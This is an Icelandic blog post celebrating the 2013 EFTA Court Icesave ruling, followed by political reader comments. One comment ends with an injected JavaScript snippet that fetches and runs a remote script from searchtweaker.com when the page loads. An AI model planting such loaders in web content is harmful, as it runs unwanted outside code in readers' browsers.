Leita í fréttum mbl.is

Til hamingju Ísland.

Við getum vissulega óskað hvort öðru til hamingju íslendingar vegna sigurs í ICESAVE málinu. 

Það eru einkum tveir menn sem öðrum fremur komu fram með þeim hætti að Ísland samdi ekki af sér með því að samþykkja ICESAVE samninga ríkisstjórnarinnar, Davíð Oddsson ritstjóri Morgunblaðsins og Ólafur Ragnar Grímsson forseti lýðveldisins.

Allt frá upphafi var Davíð Oddsson sannfærður um það að Íslandi bæri ekki að greiða vegna ICESAVE og fór hamförum gegn samningum ríkisstjórnarinnar svo sem honum einum er lagið. Með skrifum sínum og andstöðu hafði Davíð þau áhrif að mikill meiri hluti þjóðarinnar snérist gegn samningum ríkisstjórnarinnar. Ólafur Ragnar Grímsson neitaði ítrekað að samþykkja vilja merihluta Alþingis. Sú afstaða forsetans hefur nú fengið verðskuldaða réttlætingu með dómi EFTA dómstólsins.

Dómur EFTA dómstólsins leiðir til þess að við losnum undan milljarðasúpunni sem ríkisstjórnin vildi að við greiddum. Þó þeir Davíð og Ólafur hafi orðið merkisberar baráttunnar gegn því hryðjuverki sem ríkisstjórnin vildi vinna þjóðinni þá eiga ýmsir aðrir einnig mikinn heiður skilið og skal hér látið nægja að minnast á framlag þeirra Stefáns Más fyrrum prófessors og Lárusar Blöndal lögmanns sem og Indefense hópsins.

Eftir stendur að ríkisstjórn Íslands og meirihluti Alþingis getur ekki hlaupist undan því að hafa viljað leggja óbærilegan skuldaklafa á íslensku þjóðina, sem framsýnir og glöggir menn eins og Davíð Oddsson og Ólafur Ragnar Grímsson gátu með hörku og einbeitni komið í veg fyrir.

Er ekki rétt að þau Jóhanna Sigurðardóttir og Steingrímur J. Sigfússon axli ábyrgð og segi af sér ekki síðar en þegar í stað?


« Síðasta færsla | Næsta færsla »

Athugasemdir

1 Smámynd: Árni Gunnarsson

Getum við ekki sleppt því að þakka áróðri Morgunblaðsins fyrir ákvörðun forsetans og þorra kjósenda?

Það er liðin tíð að þjóðin láti Davíð Oddsson leiða sig í skoðunum.

Þökk sé vaxandi upplýsingu.

Árni Gunnarsson, 28.1.2013 kl. 11:32

2 Smámynd: Jón Sveinsson

Til hamingju Jón Magnússon fyrir að standa vaktina í þessu máli þú átt heiður skilið....

Jón Sveinsson, 28.1.2013 kl. 12:37

3 Smámynd: Kjartan Sigurgeirsson

Það væri nú nokkuð notalegt svona þegar aðeins fer að hlýna með hækkandi sól að setja alla þá sem börðust fyrir því að þjóðin greiddi skuldir fjárglæframanna í gapastokk á Lækjartorgi svo við sem sluppum undan ofríki þeirra fáum að kasta í þau svona eins og einum tómat eða svo.  Til Hamingju öll hin.

Kjartan Sigurgeirsson, 28.1.2013 kl. 13:37

4 Smámynd: Sigurður Ingólfsson

Ég man ekki betur en að Alþingi hafi samþykkt Icesave samningana með miklum meirihluta. Ólafur greip inn í ásamt fleirum og þjóðin sá um rest. Óþarfi að skella allri skuldinni á Steingrím og Jóhönnu.

Sigurður Ingólfsson, 28.1.2013 kl. 15:12

5 identicon

Ég hef enga trú á því að þau segi af sér slík hefur slímsetan verið.

Þarf icesave byltingu til að losna við þau ?

Að vinna icesave og losna við ríkisstjórnina er eins og að fá tvo lottóvinninga sama dag :)

Emil Emilsson (IP-tala skráð) 28.1.2013 kl. 15:45

6 Smámynd: Jón Magnússon

Hvað sem þér finnst um Davíð kæri vinur þá á hann mikinn heiður skilið fyrir að hafa frá fyrsta degi barist gegn því að þjóðin yrði látinn borga fyrir Icesave. Það var enginn sem barðist á jafn áhrifaríkan hátt og Davíð allt frá upphafi.  Árni ég hef ekki verið stuðningsmaður Ólafs Ragnars en ég viðurkenni það sem hann gerir vel. Skoðaðu betur hvort þú eigir ekki að þakka Davíð fyrir það sem hann á sannarlega skilið.

Jón Magnússon, 28.1.2013 kl. 16:32

7 Smámynd: Jón Magnússon

Þakka þér fyrir Jón en það eru aðrir eins og ég bendi á sem eiga heiðurinn mun frekar skilið.

Jón Magnússon, 28.1.2013 kl. 16:32

8 Smámynd: Jón Magnússon

Nei Kjartan ég mæli ekki með gapastokk hvorki fyrir þetta né annað. En Steingrímur J. ætti að segja af sér strax í dag. Hvernig ætlar hann að víkja sér undan ábyrgð?

Jón Magnússon, 28.1.2013 kl. 16:33

9 Smámynd: Jón Magnússon

Icesave 3 var samþykkt með auknum meiri hluta á Alþingi en Icesave 2 með atkvæðum stjórnarflokkana þ.e. örlítill meiri hluti. Steingrímur J ber ábyrgð á öllu klúðrinu varðandi Icesave og fram hjá því verður ekki litið. Hann á að segja af sér. Spurning hins vegar með Jóhönnu.

Jón Magnússon, 28.1.2013 kl. 16:35

10 Smámynd: Jón Magnússon

Sammála Emil.

Jón Magnússon, 28.1.2013 kl. 16:36

11 identicon

Tek undir með þér með hann Davíð og Ólaf og einnig að Steingrímur beri að segja af sér, en hvað með alla hina sem samþykktu  Iceave skuldaklafann sem átti að setja á þjóðina ? 

Hvað með Bjarna Ben? Ég held að Sjálfstæðisflokkurinn ætti að skipta um forystusauðinn.

Rafn Haraldur Sigurðsson (IP-tala skráð) 28.1.2013 kl. 18:01

12 Smámynd: Jón Magnússon

Rafn við erum greinilega  sammála varðandi þá Davíð og Ólaf.

Jón Magnússon, 28.1.2013 kl. 20:30

13 identicon

Mikil lágkúra þetta.

Hverjir áttu mestan þátt í einkavinavæðunguni.
Hvernig gjalda þeir fyrir þær afleiðingar allar.
Iceave er bara lítil hluti þess dæmis.

Spurningin er ekki bara að hafa lagalega rétt fyrir sér (sem ég studdi) það þarf líka að hugsa um við viðsemjanda sem er viðskiptavinur okkar.

Það er vel þekkt í viðskiptum að mætast á stað sem allir eru sáttir við.

Ekki bara "dead right."

Vona bara að slíkir menn finnist en í dag. 

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Haraldur (IP-tala skráð) 28.1.2013 kl. 21:51

14 Smámynd: Kjartan Sigurgeirsson

Sennilega hefur þessi hugmynd um gapastokkinn verið nokkuð unggæðingsleg, en ég verð að segja að það gladdi mitt hjarta að sjá Steingrím J. sitja eins og lúbarinn rakka undir ákúrum Sigmundar Davíðs í Kastljósinu í kvöld.  Því miður eru ekki teljandi líkur á að stjórnarherrar taki poka sína eins og þeim bæri að gera ef þeir hefðu eitthvert siðferði, þeir berja sér á brjóst og láta eins og þeim hafi aldrei dottið annað í hug en að standa fast gegn ofríki Evrópusambandsríkjanna "vina" okkar, svo mjög að maður finnur til ógleði.

Kjartan Sigurgeirsson, 28.1.2013 kl. 22:31

15 Smámynd: Vilhjálmur Eyþórsson

ÓRG skrifaði undir Svavarssamninginn, en þegar Indefence o.fl. mættu með undirskriftalista sá hann hvernig vindurinn blés og sá sér leik á borði að leirétta mannorðið sem var í ræsinu eftir útrásina. Hann var aðeins að bjarga eigin skinni.

Vilhjálmur Eyþórsson, 28.1.2013 kl. 23:32

16 Smámynd: Björn Emilsson

Fara þar fyrir kappar miklir 'Olafur Ragnar Grimsson stendur vaktina, og nú er timi til kominn að Davið Oddsson drífi sig í brúna. 

Björn Emilsson, 28.1.2013 kl. 23:40

17 Smámynd: Jón Magnússon

Haraldur bankahrunið var ekki afleiðing af einkavæðingu mörgum árum áður. Hvaða banki fór fyrstur? Var það ekki Glitnir. Var hann einkavinavæddur?  Síður en svo.  Eina sem mátti gagnrýna í söluferli bankanna var að ekki skyldi vera haldið við upphafleg markmið. En það hafði hins vegar ekkert með bankahrunið að gera.

Jón Magnússon, 29.1.2013 kl. 23:43

18 Smámynd: Jón Magnússon

Ég tók það nú sem grín Kjartan þó mér fyndist allt í lagi að stríða þér svolítið. Ég er sammála þér með Steingrím.

Jón Magnússon, 29.1.2013 kl. 23:44

19 Smámynd: Jón Magnússon

Batnandi manni er best að lifa stendur einhversstaðar Vilhjálmur er það ekki þannig.

Jón Magnússon, 29.1.2013 kl. 23:45

20 Smámynd: Jón Magnússon

Þó fyrr hefði verið Björn.

Jón Magnússon, 29.1.2013 kl. 23:45

Bæta við athugasemd

Ekki er lengur hægt að skrifa athugasemdir við færsluna, þar sem tímamörk á athugasemdir eru liðin.

Höfundur

Jón Magnússon
Jón Magnússon

Síðuritari er Hæstaréttarlögmaður og fyrrverandi alþingismaður.

 

Eldri færslur

Jan. 2025
S M Þ M F F L
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31  

Heimsóknir

Flettingar

  • Í dag (27.1.): 690
  • Sl. sólarhring: 931
  • Sl. viku: 6426
  • Frá upphafi: 2473096

Annað

  • Innlit í dag: 627
  • Innlit sl. viku: 5855
  • Gestir í dag: 602
  • IP-tölur í dag: 589

Uppfært á 3 mín. fresti.
Skýringar

Innskráning

Ath. Vinsamlegast kveikið á Javascript til að hefja innskráningu.

Hafðu samband